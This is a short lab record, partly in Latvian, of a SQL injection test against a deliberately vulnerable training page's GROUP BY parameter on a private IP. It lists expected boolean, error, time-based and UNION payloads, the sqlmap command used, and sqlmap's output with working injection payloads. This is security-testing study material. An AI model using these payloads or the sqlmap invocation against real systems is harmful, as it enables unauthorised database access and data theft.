=================================================================================
1. Īpašība: tiek injicēts “GROUP BY” klauzulā
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?group=username having username like 'usxxx%25'
3.2. error-based: ?group=username'
3.3. time-based: ?group=username or sleep(1)
3.4. union: ?group=username union select 1,2,3
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 87908266 nanosekundes
6. Palaistā komanda
sqlmap -u "http://192.168.17.134/sqlinjection/example6/?group=username" -p group --risk=3 --level=5


7. Jautājumi, kurus uzdeva SQLMap
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameter 'group' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
back-end DBMS: MySQL >= 5.1
sqlmap identified the following injection point(s) with a total of 671 HTTP(s) requests:
---
Parameter: group (GET)
    Type: boolean-based blind
    Title: HAVING boolean-based blind - WHERE, GROUP BY clause
    Payload: group=username HAVING 5317=5317

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: group=username AND (SELECT 5507 FROM(SELECT COUNT(*),CONCAT(0x716a627071,(SELECT (ELT(5507=5507,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: group=username OR SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: group=username UNION ALL SELECT NULL,CONCAT(0x716a627071,0x50764879467261747a6e6855515641454277694a78614e5a6a6674537a465357455a79687a4b4c6b,0x716a7a7171),NULL-- -
---
web server operating system: Linux Debian 6 (squeeze)
web application technology: Apache 2.2.16
back-end DBMS: MySQL >= 5.0
